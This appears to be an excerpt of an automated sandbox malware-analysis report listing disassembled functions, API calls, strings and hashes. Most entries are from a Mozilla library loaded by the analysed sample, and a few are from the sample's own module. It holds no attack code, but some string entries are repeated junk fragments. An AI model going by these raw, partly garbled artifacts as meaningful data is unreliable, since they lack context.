Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 1bae16c69938a1c18627050d069dda6c4be59a772c1f360cd026019de2e10309
Instruction ID: b4486afb32cc3675b14e16c5b090588918b52afe1fc9af4824a0016520ce7c4e
Opcode Fuzzy Hash: 1bae16c69938a1c18627050d069dda6c4be59a772c1f360cd026019de2e10309
Instruction Fuzzy Hash: 22213A317017166BDB19AA24DC98BAEB779AF4A344F50411DF90BE7A80DB30DC418792

Function 6C9B3060 Relevance: 4.5, APIs: 3, Instructions: 36
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C9B3095

Part of subcall function 6C9B35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3F688,00001000), ref: 6C9B35D5
Part of subcall function 6C9B35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9B35E0
Part of subcall function 6C9B35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9B35FD
Part of subcall function 6C9B35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C9B363F
Part of subcall function 6C9B35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C9B369F
Part of subcall function 6C9B35A0: __aulldiv.LIBCMT ref: 6C9B36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9B309F

Part of subcall function 6C9D5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B85
Part of subcall function 6C9D5B50: EnterCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B90
Part of subcall function 6C9D5B50: LeaveCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5BD8
Part of subcall function 6C9D5B50: GetTickCount64.KERNEL32 ref: 6C9D5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9B30BE

Part of subcall function 6C9B30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C9B3127
Part of subcall function 6C9B30F0: __aulldiv.LIBCMT ref: 6C9B3140

Part of subcall function 6C9EAB2A: __onexit.LIBCMT ref: 6C9EAB30

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: e04ff50c864fe187837fc0f0dffa41a7d510595f41ad17b06c7d755398b06d7e
Instruction ID: 18c044645695a098a5345ed8fdea28b2c51b08c9a2b1d2bbcd064a42ed66037f
Opcode Fuzzy Hash: e04ff50c864fe187837fc0f0dffa41a7d510595f41ad17b06c7d755398b06d7e
Instruction Fuzzy Hash: 6BF0A252E30B8A96CB24DF348D511E6B370AF7B114B10A31EE84CA3521FB30A1D98391

Function 00692E84 Relevance: 1.3, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@nl, xrefs: 00692EE4, 00692EFF, 00692F17

Memory Dump Source

Source File: 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.2622396064.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.00000000003A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.00000000006E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000735000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000A8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000D33000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: @nl
API String ID: 0-815873928
Opcode ID: a6bc88c41de4de9977c1a907e3a4d5d27db1582948eed8b88be238ef5e68c5f7
Instruction ID: 09237fa3258d1aebe5b3c00044fdf1e1535798b066c08955c2be0c10fa287a1e
Opcode Fuzzy Hash: a6bc88c41de4de9977c1a907e3a4d5d27db1582948eed8b88be238ef5e68c5f7
Instruction Fuzzy Hash: F511C4B17001429FE715DF29D8C5EA9B7EBBF8A304F1092B1E405877A5CB759C82CB94

Function 006F3B8C Relevance: 1.3, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 006F3BB7

Memory Dump Source

Source File: 00000000.00000002.2622413487.00000000006E6000.00000040.00000001.01000000.00000003.sdmp, Offset: 0059C000, based on PE: true

Associated: 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000735000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2622413487.0000000000A8D000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8edbad92a3b20204970689bc9b8990d605cac96b404a767cbccc477ec1702a17
Instruction ID: a91d5fae5419bed87ec9581542ca32280db17c9b283c1ca8932682d49aac937b
Opcode Fuzzy Hash: 8edbad92a3b20204970689bc9b8990d605cac96b404a767cbccc477ec1702a17
Instruction Fuzzy Hash: 14E0E2B630061DABDF10CE8CD8A4BAB339EEBA8310F148011FA09D7304C274EE529765

Non-executed Functions

Function 6C9C5440 Relevance: 142.3, APIs: 54, Strings: 27, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C9C5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9C54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9C54BE
__Init_thread_footer.LIBCMT ref: 6C9C54DB

Part of subcall function 6C9EAB3F: EnterCriticalSection.KERNEL32(6CA3E370,?,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB49
Part of subcall function 6C9EAB3F: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EAB7C

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

GetCurrentThreadId.KERNEL32 ref: 6C9C54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C9C5516
GetCurrentThreadId.KERNEL32 ref: 6C9C556A
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C5577
moz_xmalloc.MOZGLUE(00000070), ref: 6C9C5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C9C5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C9C55E6
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C5616

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

GetCurrentThreadId.KERNEL32 ref: 6C9C563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9C5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C9C567C
free.MOZGLUE(?), ref: 6C9C56AE

Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C9C56E8
GetCurrentThreadId.KERNEL32 ref: 6C9C5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C9C570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C9C5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C9C574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C9C576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C9C5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C9C57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C9C57CA

Strings

- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C9C5CF9
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C9C5D1C
QCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafu, xrefs: 6C9C57BC
[I %d/%d] profiler_init, xrefs: 6C9C564E
MOZ_PROFILER_STARTUP, xrefs: 6C9C55E1
GeckoMain, xrefs: 6C9C5554, 6C9C55D5
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C9C57C5
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C9C57AE
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C9C584E
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C9C5BBE
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C9C5749
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C9C5717
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9C548D
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C9C5AC9
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C9C5724
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C9C5D24
TwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.ex, xrefs: 6C9C5732
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C9C5D2B
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C9C5766
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9C54A3
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C9C5D01
MOZ_BASE_PROFILER_HELP, xrefs: 6C9C5511
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C9C56E3
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C9C5C56
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9C54B9
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C9C5B38
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C9C5791

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$QCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafu$TwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.ex$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-990788773
Opcode ID: f646fa98236b10308e33533eae65a6206acaa42f1e49382b41ba35b002985fd8
Instruction ID: 983ec2d7c63f9ade50ab9e9c1e116d828fb30292602eb2960ad45d0fea281951
Opcode Fuzzy Hash: f646fa98236b10308e33533eae65a6206acaa42f1e49382b41ba35b002985fd8
Instruction Fuzzy Hash: A8223671A047519FD7109F748C6426A7BB9BF5634CF14862AE84AC7B41EB34C886CB63

Function 6C9C6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C9C6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C9C6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C9C6D26

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C9C6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C9C6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C9C6D73
free.MOZGLUE(00000000), ref: 6C9C6D80
CertGetNameStringW.CRYPT32 ref: 6C9C6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C9C6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C9C6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C9C6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C9C6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C9C6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C9C6E34
CreateFileW.KERNEL32 ref: 6C9C6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C9C6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C9C6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C9C709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C9C7103
free.MOZGLUE(00000000), ref: 6C9C7153
CloseHandle.KERNEL32(?), ref: 6C9C7176
__Init_thread_footer.LIBCMT ref: 6C9C7209
__Init_thread_footer.LIBCMT ref: 6C9C723A
__Init_thread_footer.LIBCMT ref: 6C9C726B
__Init_thread_footer.LIBCMT ref: 6C9C729C
__Init_thread_footer.LIBCMT ref: 6C9C72DC
__Init_thread_footer.LIBCMT ref: 6C9C730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9C73C2
VerSetConditionMask.NTDLL ref: 6C9C73F3
VerSetConditionMask.NTDLL ref: 6C9C73FF
VerSetConditionMask.NTDLL ref: 6C9C7406
VerSetConditionMask.NTDLL ref: 6C9C740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C9C741A
moz_xmalloc.MOZGLUE(?), ref: 6C9C755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9C7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C9C7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C9C7598
free.MOZGLUE(00000000), ref: 6C9C75AC

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

Strings

(, xrefs: 6C9C768A
SHA256, xrefs: 6C9C6EC0
wintrust.dll, xrefs: 6C9C72CD
CryptCATAdminReleaseCatalogContext, xrefs: 6C9C72C8

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 8ee5ff3b6d823f54a4aa98d8f1f6102d89f231a5b5793de92eb28d19f50ce141
Instruction ID: 8ceb47175be2def7fd1ea3aa263f91f7fa1680ca93e9cb58b9897203b637f6f2
Opcode Fuzzy Hash: 8ee5ff3b6d823f54a4aa98d8f1f6102d89f231a5b5793de92eb28d19f50ce141
Instruction Fuzzy Hash: 9052C1B1A003159BEB259F24CC98BAA77BDEF59708F108199E809D7640DB70EF85CF52

Function 6C9E6FF0 Relevance: 89.1, APIs: 39, Strings: 10, Instructions: 3347COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E7019
LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E7061
EnterCriticalSection.KERNEL32(?), ref: 6C9E71A4
LeaveCriticalSection.KERNEL32(?), ref: 6C9E721D
memcpy.VCRUNTIME140(?,?,?), ref: 6C9E723E
EnterCriticalSection.KERNEL32(?), ref: 6C9E726C
memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6C9E72B2
LeaveCriticalSection.KERNEL32(?), ref: 6C9E733F
EnterCriticalSection.KERNEL32(0000000C), ref: 6C9E73E8
LeaveCriticalSection.KERNEL32(?), ref: 6C9E961C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9E9622
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E9642
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E964F
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E96CE
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9E96DB
AcquireSRWLockExclusive.KERNEL32(6CA3E804), ref: 6C9E9747
GetSystemInfo.KERNEL32(?), ref: 6C9E9792
__Init_thread_footer.LIBCMT ref: 6C9E97A5
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CA3E810,00000040), ref: 6C9E97CF
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7B8,00001388), ref: 6C9E9838
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E744,00001388), ref: 6C9E984E
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E784,00001388), ref: 6C9E9874
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7DC,00001388), ref: 6C9E9895

Strings

MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9E99BD
MOZ_CRASH(), xrefs: 6C9E9B42
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C9E9993
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9E99D2
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9E9933, 6C9E9A33, 6C9E9A4E
<jemalloc>, xrefs: 6C9E9B33, 6C9E9BE3
Compile-time page size does not divide the runtime one., xrefs: 6C9E9B38
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9E99A8
: (malloc) Unsupported character in malloc options: ', xrefs: 6C9E9BF4
MALLOC_OPTIONS, xrefs: 6C9E97CA

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 4047164644-4173974723
Opcode ID: cf91a649dc5a9a5301ab2fc6a71565dc76855ddafa2acf44b02ec3a8f184060e
Instruction ID: c8e137502fd52a88e9a349c2a136c3231d30f814641cfd06eb73faf5dcd8c108
Opcode Fuzzy Hash: cf91a649dc5a9a5301ab2fc6a71565dc76855ddafa2acf44b02ec3a8f184060e
Instruction Fuzzy Hash: 6C53AE71A057028FD709CF2CC580755BBE5BF99328F29C6ADE8698B792D731E841CB81

Function 6C9F0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C9F0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C9F0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C9F0FB7
EnterCriticalSection.KERNEL32(?), ref: 6C9F0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C9F1031
LeaveCriticalSection.KERNEL32(?), ref: 6C9F10D0
EnterCriticalSection.KERNEL32(?), ref: 6C9F117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C9F1C39
EnterCriticalSection.KERNEL32(6CA3E744), ref: 6C9F3391
LeaveCriticalSection.KERNEL32(6CA3E744), ref: 6C9F33CD
LeaveCriticalSection.KERNEL32(?), ref: 6C9F3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9F3437

Strings

MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9F37BD
MOZ_CRASH(), xrefs: 6C9F3950
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C9F3793
